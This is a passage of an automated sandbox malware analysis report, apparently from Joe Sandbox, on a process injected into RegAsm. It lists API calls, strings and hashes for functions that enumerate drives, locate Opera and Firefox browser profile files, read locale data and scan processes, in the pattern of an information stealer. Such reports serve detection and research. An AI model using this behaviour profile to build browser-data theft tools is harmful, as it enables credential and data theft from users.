                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: memset$lstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                        • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$*;A
                                                        • API String ID: 1581841332-4140487488
                                                        • Opcode ID: 874729d309dac1dc91faef70b84df16fca56b2db47e01cb70b46b5a43f58bff4
                                                        • Instruction ID: 52d7c73129157dbc7be5f45e7af1fbf57da1902eca9a3bc0a63531c14fa48f53
                                                        • Opcode Fuzzy Hash: 874729d309dac1dc91faef70b84df16fca56b2db47e01cb70b46b5a43f58bff4
                                                        • Instruction Fuzzy Hash: B941B5B1900158ABEF24EF72CC85EEF37ADEF14346F50042AF949A3092DA385B45CB65
                                                        Function 00409B68 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 496fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041E266,00000000,?,?), ref: 00409BCB
                                                        • StrCmpCA.SHLWAPI(?,0041E258), ref: 00409BF4
                                                        • StrCmpCA.SHLWAPI(?,0041E254), ref: 00409C0E
                                                        • StrCmpCA.SHLWAPI(00000000,Opera,0041E266,0041E266,0041E266,0041E266,0041E266,0041E266,0041E266), ref: 00409C69
                                                        • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 00409C7D
                                                        • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 00409C91
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 0040F81D: GetFileAttributesA.KERNEL32(00000000,?,?,0040AF3A,?,?,?,?), ref: 0040F82A
                                                          • Part of subcall function 00409645: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0041E266,0041E266,0041E264,75B0AC90), ref: 00409691
                                                          • Part of subcall function 00409645: StrCmpCA.SHLWAPI(?,0041E258), ref: 004096B3
                                                          • Part of subcall function 00409645: StrCmpCA.SHLWAPI(?,0041E254), ref: 004096CD
                                                        • FindNextFileA.KERNEL32(?,?), ref: 0040A1E3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$File$Find$Firstlstrcat$AttributesNextlstrlen
                                                        • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                        • API String ID: 3824151033-1710495004
                                                        • Opcode ID: 8c76291f8ea2a517bfd4bf6c3c128faaf7b1f9d1a642f46f40dfeda4a6674f18
                                                        • Instruction ID: 678a46f948dd3a77772e9f62bfda00cb9fb0f881f72f095b2a996737d61d61b8
                                                        • Opcode Fuzzy Hash: 8c76291f8ea2a517bfd4bf6c3c128faaf7b1f9d1a642f46f40dfeda4a6674f18
                                                        • Instruction Fuzzy Hash: 8A02ED72900118ABCB14FBA2DD56DED7778AF14308F400D7AF806B21D2FE39AB59CA55
                                                        Function 004013B4 Relevance: 16.4, APIs: 8, Strings: 1, Instructions: 646fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041E264,?,00401EA9,?,0041E264,?,?,00000000,?,00000000), ref: 0040156F
                                                        • StrCmpCA.SHLWAPI(?,0041E258), ref: 0040158D
                                                        • StrCmpCA.SHLWAPI(?,0041E254), ref: 004015A7
                                                        • FindFirstFileA.KERNEL32(00000000,?,?,?,?,0041E264,?,00401EA9,?,0041E264,?,?,?,0041E264,?,?), ref: 00401690
                                                          • Part of subcall function 0040F84D: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0040F87B
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 004069B4: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00421EE4,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069D2
                                                          • Part of subcall function 004069B4: GetFileSizeEx.KERNEL32(00000000,?,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069E9
                                                          • Part of subcall function 004069B4: LocalAlloc.KERNEL32(00000040,?,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A05
                                                          • Part of subcall function 004069B4: ReadFile.KERNEL32(?,00000000,?,0040B0D3,00000000,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A1F
                                                          • Part of subcall function 004069B4: CloseHandle.KERNEL32(?,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A40
                                                        • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 0040190E
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040191D
                                                        • FindNextFileA.KERNEL32(?,?), ref: 00401BF0
                                                        • FindClose.KERNEL32(?), ref: 00401C01
                                                          • Part of subcall function 0041296A: _MSFOpenExW.MSPDB140-MSVCRT ref: 00412A12
                                                          • Part of subcall function 0041296A: CreateThread.KERNEL32(00000000,00000000,004118D1,?,00000000,00000000), ref: 00412A27
                                                          • Part of subcall function 0041296A: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00412A2F
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040F81D: GetFileAttributesA.KERNEL32(00000000,?,?,0040AF3A,?,?,?,?), ref: 0040F82A
                                                          • Part of subcall function 0040F6C3: GetSystemTime.KERNEL32(00000000,0041E266,0041E266,00421EE4,00000000), ref: 0040F6EC
                                                          • Part of subcall function 004069B4: LocalFree.KERNEL32(fA,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A35
                                                          • Part of subcall function 0041296A: Sleep.KERNEL32(000003E8,?,0041351E,?,?,00421690,00421414,00421EE4), ref: 004129DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectOpenPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                        • String ID: \*.*
                                                        • API String ID: 4214597247-1173974218
                                                        • Opcode ID: 04fc3973493c2e89c83408ba8da168f34b1c629e3920fc9a31c2f25af281379c
                                                        • Instruction ID: 68986560c6bec475148e3a325d81b87b41ff477edc02617120fd8f97f6d07058
                                                        • Opcode Fuzzy Hash: 04fc3973493c2e89c83408ba8da168f34b1c629e3920fc9a31c2f25af281379c
                                                        • Instruction Fuzzy Hash: D732B172900118AACB14EBA2DD56DEE737CAF14308F40097BF506B21D2FE396B59CB55
                                                        Function 0040AB08 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 256fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214CC,0041E266,?,?,0041E266), ref: 0040AB6B
                                                        • StrCmpCA.SHLWAPI(?,0041E258,?,?,0041E266), ref: 0040AB89
                                                        • StrCmpCA.SHLWAPI(?,0041E254,?,?,0041E266), ref: 0040ABA3
                                                        • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,0041E264,?,?,0041E266,?,?,0041E266), ref: 0040AC1A
                                                          • Part of subcall function 0040F6C3: GetSystemTime.KERNEL32(00000000,0041E266,0041E266,00421EE4,00000000), ref: 0040F6EC
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,0041E264,?,00000000,0041E266,?,?,0041E266), ref: 0040ACDA
                                                        • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,0041E266), ref: 0040AD80
                                                        • FindNextFileA.KERNELBASE(?,?,?,?,0041E266), ref: 0040AE10
                                                        • FindClose.KERNEL32(?,?,?,0041E266), ref: 0040AE21
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                        • String ID: prefs.js
                                                        • API String ID: 893096357-3783873740
                                                        • Opcode ID: 5644fa34cc23ff8f232ff7225bb71085356a6df4332d0ee735c31a0c8351b7b2
                                                        • Instruction ID: 241b7206249ffb134c6b1fae34169c6b4040ee3814d75d9830fa16ba44b011f2
                                                        • Opcode Fuzzy Hash: 5644fa34cc23ff8f232ff7225bb71085356a6df4332d0ee735c31a0c8351b7b2
                                                        • Instruction Fuzzy Hash: C0913E71D00108ABCB14FBB2DC56DEE7778AF14308F40493AE916B31D2FE395A59CA99
                                                        Function 00409317 Relevance: 13.7, APIs: 9, Instructions: 243fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214CC,0041E266,?,?), ref: 00409379
                                                        • StrCmpCA.SHLWAPI(?,0041E258,?,?), ref: 00409396
                                                        • StrCmpCA.SHLWAPI(?,0041E254,?,?), ref: 004093B0
                                                        • StrCmpCA.SHLWAPI(?,00000000,?,?,?,0041E264,?,?,0041E266,?,?), ref: 00409427
                                                        • StrCmpCA.SHLWAPI(?,?,?), ref: 0040948C
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 00408809: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,0041E264,?,00000000,0041E266,00000000,0041E266), ref: 004088C7
                                                        • FindNextFileA.KERNELBASE(00000000,?,?,?), ref: 00409601
                                                        • FindClose.KERNEL32(00000000,?,?), ref: 00409610
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 3801961486-0
                                                        • Opcode ID: cf116802d2b538c2cc3f7ea39ce3abcc3fbff2d25cfc5372fffbda9e5fbce312
                                                        • Instruction ID: e955c1c05732158d98ffffa6ca39c395da9f30dff68168dc085fbe2cb8803b5e
                                                        • Opcode Fuzzy Hash: cf116802d2b538c2cc3f7ea39ce3abcc3fbff2d25cfc5372fffbda9e5fbce312
                                                        • Instruction Fuzzy Hash: 02810271900108ABCF14FBB3DC5A9DE37BDAB44348F40493AF805E21D2EE799A198A95
                                                        Function 0040E910 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,0041E266,00421690,00421414,00421EE4), ref: 0040E930
                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040E93E
                                                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0040E948
                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0040E96D
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                        • LocalFree.KERNEL32(00000000), ref: 0040E9ED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                        • String ID: /
                                                        • API String ID: 507856799-4001269591
                                                        • Opcode ID: fc527670eb7ac5e3c8880c488802fae4541b327f12e23526085922d245d1052d
                                                        • Instruction ID: 0cc4ce962f1c414cdbfadabdd0f7bacb6d14139189d875ba47295f2f73e64c2f
                                                        • Opcode Fuzzy Hash: fc527670eb7ac5e3c8880c488802fae4541b327f12e23526085922d245d1052d
                                                        • Instruction Fuzzy Hash: 5C213D71900218BBDB10EBE2DC89EEE777DEB48344F504866F901B61C1DA789A45CB74
                                                        Function 0040FD2A Relevance: 9.0, APIs: 6, Instructions: 47processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 0040FD2F
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040FD55
                                                        • Process32First.KERNEL32(00000000,00000128), ref: 0040FD65
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0040FD77
                                                        • StrCmpCA.SHLWAPI(?,?), ref: 0040FD8B
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040FDA1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 186290926-0
                                                        • Opcode ID: 48dd32ca8d455a82565c977931ca7b82890a297e88ea3d7a2a6876a490ce1a9e
                                                        • Instruction ID: 55b29e6fedf4dab56c6b41c0c7a396a6175e51b9b083d32a244007f3d7cb4eb4
                                                        • Opcode Fuzzy Hash: 48dd32ca8d455a82565c977931ca7b82890a297e88ea3d7a2a6876a490ce1a9e
                                                        • Instruction Fuzzy Hash: 11010971A01129AFDB209F65DD09AEEBBB8EF45350F004176E806E2290D7789B44CFA9
                                                        Function 0040FE05 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 0040FE0A
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040FE30
                                                        • Process32First.KERNEL32(00000000,00000128), ref: 0040FE40
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0040FE52
                                                        • StrCmpCA.SHLWAPI(?,?), ref: 0040FE66
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040FE77
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
